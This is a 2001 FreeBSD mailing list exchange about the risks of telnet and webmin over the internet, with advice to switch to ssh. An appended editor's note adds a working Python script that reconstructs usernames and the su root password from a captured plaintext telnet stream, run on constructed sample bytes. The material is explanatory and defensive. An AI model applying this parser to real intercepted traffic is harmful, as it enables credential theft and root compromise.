From owner-freebsd-questions Sat May 26 21:39:52 2001
Date: Sun, 27 May 2001 00:39:23 -0500
From: David Banning
To: Bill Moran
Cc: david@banning.com, questions@FreeBSD.ORG
Subject: Re: security question
Message-ID: <20010527003923.A1691@yahoo.com>
References: <200105260324.f4Q3OrH00551@d.tracker> <3B0FC0D0.28E01292@iowna.com>
In-Reply-To: <3B0FC0D0.28E01292@iowna.com>; from wmoran@iowna.com on Sat, May 26, 2001 at 10:42:24AM -0400

On Sat, May 26, 2001 at 10:42:24AM -0400, Bill Moran wrote:
> David Banning wrote:
> >
> > I am setting up a small network of Windows desktops that are
> > accessing the net through a FreeBSD server. If I disable telnet, ftp,
> > and everything in inetd.conf leaving only http open, what are my
> > risks?
>
> Your risks are that someone will crack through your http server(s). All
> you need to do at this point is monitor security alerts for whatever web
> server you're running and keep it up to date.
>
> > I have webadmin running.
>
> DO NOT run webmin over the internet via http. You are absolutely begging
> for trouble if you do that.

OK, OK, I won't.

> Install it to run over https if you want to
> access it via the Internet (I believe there's a how-to with the
> installation). If you only want to use webmin internally, be sure to
> block port 901 from the outside.

I will look into that.

> > I would *like* telnet and shell (rshd) to run, so I can telnet
> > in. I can't imagine how someone could break in to a system, so
> > I am pretty lost in assessing this risk.
>
> If you're only using telnet/ftp internally you have a very low risk.
> However, if you are using telnet/ftp over the Internet the risk is VERY
> HIGH. Here is a common scenario of what might happen.
> Cracker manages to compromise one of your ISP's firewalls/routers or any
> other intermediate machine between your telnet client and telnet server.
> He runs a traffic sniffing script that is filtering out useful data like
> telnet passwords and emailing it to him regularly. You log in one day
> and su to root to make some minor config change on the system. The
> cracker now has full access to your network, and will likely use it as a
> jump point for other attacks (if he has no interest in it directly). So
> even if he doesn't bother to hurt you, he has used you to further
> compromise the internet as a whole.
> A similar scenario could occur with webmin or ftp. If you'd like to see
> a demonstration, I'd be happy to arrange it, I've done it for other
> folks to scare them into sanity.

How does the demonstration go?

> > I know SSH is better for telneting in to the server, but then
> > it has to be on every machine that you telnet in from.
>
> Weigh the cost vs. risk here. A free windows ssh client like putty
> (http://www.chiark.greenend.org.uk/~sgtatham/putty/) makes you a fool
> not to use ssh.

OK - I've got it, I've been using the telnet side. I'm just trying to
figure out how to use SSH.

> > When I hear "don't use telnet unless you have to", I
> > wonder. I know several sites that have telnet where I can login,
> > and those places are a lot bigger than my little ol' place.
>
> This is exactly why it is so dangerous. Large numbers of systems are
> already compromised, each one of these can be used to sniff passwords,
> etc. Remember those highly publicized attacks on yahoo and others not
> long ago. Those attacks required hundreds of cracked computers to
> execute.
> If you're wondering why someone would bother to attack you, then ask
> yourself this: why would someone bother to cripple yahoo's servers?
> There was no financial gain involved. No credit card numbers were
> stolen.
> At the very least, you don't want to be one of the people who gets a
> call the next time. "Mr. Banning, it appears your server has been
> cracked and is being used as part of a large scale denial of service
> attack, could you please take the necessary steps to stop this attack
> and re-secure your server." (Generally means, shutdown your machine and
> reinstall, change every password - since there's no other way to
> guarantee the security after that.)

Yikes-

> > place to learn about this topic?
>
> I started with the FreeBSD Security How-to which is a good starter.
>
> www.rootprompt.org generally has good articles on this topic.

Bill, your message has been very informative and helpful. Thanks.
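Editor's note, added after the thread: the "demonstration" Bill describes is nothing more than reading a telnet session off the wire. Telnet carries the login name, the password and, later, the password typed at the `su` prompt as plain bytes, so any host on the path (the compromised ISP router in the scenario) can reassemble them with a few dozen lines of code. The example below is not part of either message and is not anyone's real sniffer; it is an added illustration that takes an already captured, direction-tagged telnet byte stream (the `SESSION` bytes are constructed for this page; the host name and passwords are made up) and pulls out exactly what the thread says a sniffer would: the answers to every `login:` and `Password:` prompt, together with the last command typed before the prompt, which is how the root password typed after `su` is identified. The same bytes captured from an ssh session would be ciphertext, which is the whole point of Bill's advice.

```python
"""
Reconstruct credentials from a plaintext telnet session, the way a sniffer on an
intermediate hop would.  Added example, not from the original mailing-list thread.
The SESSION bytes are CONSTRUCTED for this demonstration (host name, user and
passwords are made up).
"""
import re

IAC, SB, SE = 0xFF, 0xFA, 0xF0
WITH_OPTION = {0xFB, 0xFC, 0xFD, 0xFE}          # WILL / WONT / DO / DONT take an option byte
PROMPT_RE = re.compile(rb"(login|username|password)\s*:\s*$", re.IGNORECASE)


def strip_telnet(data: bytes) -> bytes:
    """Drop IAC option negotiation so only what the user saw or typed remains."""
    out, i = bytearray(), 0
    while i < len(data):
        b = data[i]
        if b != IAC:
            out.append(b)
            i += 1
        elif i + 1 >= len(data):
            break                                 # dangling IAC at end of packet
        elif data[i + 1] == IAC:                  # IAC IAC is an escaped 0xFF
            out.append(IAC)
            i += 2
        elif data[i + 1] == SB:                   # subnegotiation runs until IAC SE
            end = data.find(bytes([IAC, SE]), i + 2)
            i = len(data) if end < 0 else end + 2
        elif data[i + 1] in WITH_OPTION:
            i += 3
        else:
            i += 2
    return bytes(out)


def extract_credentials(packets):
    """packets: (direction, payload) pairs in capture order, direction 'S' for
    server->client or 'C' for client->server.  Returns a list of
    (prompt, typed_answer, last_command_before_prompt) tuples."""
    found = []
    server_tail = b""                 # recent server output, to spot a prompt
    client_line = bytearray()         # what the client has typed on this line
    last_command = None               # last full line typed when no prompt was pending
    pending_prompt = None
    for direction, payload in packets:
        data = strip_telnet(payload)
        if direction == "S":
            server_tail = (server_tail + data)[-64:]
            m = PROMPT_RE.search(server_tail)
            if m:
                pending_prompt = m.group(0).decode("ascii", "replace").strip()
                server_tail = b""
            continue
        for b in data:
            if b in (0x0D, 0x0A):                 # CR or LF ends the typed line
                line = client_line.decode("ascii", "replace")
                client_line = bytearray()
                if pending_prompt is not None:
                    found.append((pending_prompt, line, last_command))
                    pending_prompt = None
                elif line:
                    last_command = line
            elif b in (0x08, 0x7F):               # BS / DEL: user corrected a typo
                if client_line:
                    client_line.pop()
            elif b != 0x00:                       # telnet sends CR as CR NUL; drop the NUL
                client_line.append(b)
    return found


# Constructed capture: option negotiation, a login (server echoes the name, not
# the password), then `su` and the root password.  One client packet per keystroke.
SESSION = [
    ("S", b"\xff\xfd\x18\xff\xfd\x20\xff\xfd\x23\xff\xfd\x27"),   # DO TTYPE, NAWS, ...
    ("C", b"\xff\xfc\x18\xff\xfc\x20\xff\xfc\x23\xff\xfc\x27"),   # WONT ...
    ("S", b"\xff\xfb\x01\xff\xfb\x03"),                            # WILL ECHO, WILL SGA
    ("C", b"\xff\xfd\x01\xff\xfd\x03"),
    ("S", b"\r\nFreeBSD/i386 (d.tracker) (ttyp0)\r\n\r\nlogin: "),
    ("C", b"d"), ("S", b"d"), ("C", b"a"), ("S", b"a"), ("C", b"v"), ("S", b"v"),
    ("C", b"i"), ("S", b"i"), ("C", b"d"), ("S", b"d"), ("C", b"\r\x00"), ("S", b"\r\n"),
    ("S", b"Password:"),
    ("C", b"w"), ("C", b"i"), ("C", b"n"), ("C", b"t"), ("C", b"e"), ("C", b"r"),
    ("C", b"2"), ("C", b"0"), ("C", b"0"), ("C", b"1"), ("C", b"\r\x00"),
    ("S", b"\r\nLast login: Sat May 26 on ttyp0\r\n$ "),
    ("C", b"s"), ("S", b"s"), ("C", b"u"), ("S", b"u"), ("C", b"\r\x00"), ("S", b"\r\n"),
    ("S", b"Password:"),
    ("C", b"r"), ("C", b"0"), ("C", b"0"), ("C", b"t"), ("C", b"m"), ("C", b"3"),
    ("C", b"\x7f"), ("C", b"e"), ("C", b"\r\x00"),                  # typo fixed with DEL
    ("S", b"\r\n# "),
]

if __name__ == "__main__":
    for prompt, value, cmd in extract_credentials(SESSION):
        print(f"{prompt:10} {value!r:14} (after command: {cmd!r})")
```

Run as written it prints the user name, the login password and the root password entered after `su`, labelled with the command that preceded the prompt. The password prompt after `su` is what turns a sniffed user login into root, which is the escalation Bill's scenario hinges on. After trimming inetd.conf as the thread suggests, the matching check on the FreeBSD box is `netstat -an | grep LISTEN`: nothing but sshd (22) and the web server should remain, and port 901 should be unreachable from outside.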